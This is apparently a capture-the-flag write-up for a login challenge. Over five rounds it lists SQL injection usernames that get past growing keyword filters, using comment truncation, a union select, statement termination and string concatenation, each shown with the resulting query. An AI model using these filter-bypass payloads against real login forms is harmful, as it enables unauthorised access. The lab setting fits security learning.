Try to login as admin in each round with SQL injection, mind the filter.
Filter: or
Username: admin' --
Password: 123
Actual Query: SELECT * FROM users WHERE username='admin' -- AND password='123'
Filter: or and = like --
Username: admin' union select * from users where '1
Password: 123
Actual Query: SELECT * FROM users WHERE username='admin' union select * from users where '1' AND password='123'
Filter: or and = like > < --
Username: admin';
Password: 123
Actual Query: SELECT * FROM users WHERE username='admin';' AND password='123'
Filter: or and = like > < -- admin
Username: ad'||'min';
Password: 123
Actual Query: SELECT * FROM users WHERE username='ad'||'min';' AND password='123'
Filter: or and = like > < -- union admin
Username: ad'||'min';
Password: 123
Actual Query: SELECT * FROM users WHERE username='ad'||'min';' AND password='123'
All rounds have been passed, the page of round 6 says "Congrats! You won! Check out filter.php". Refresh filter.php again it shows the source code of filter.php and flag is at the end of the page.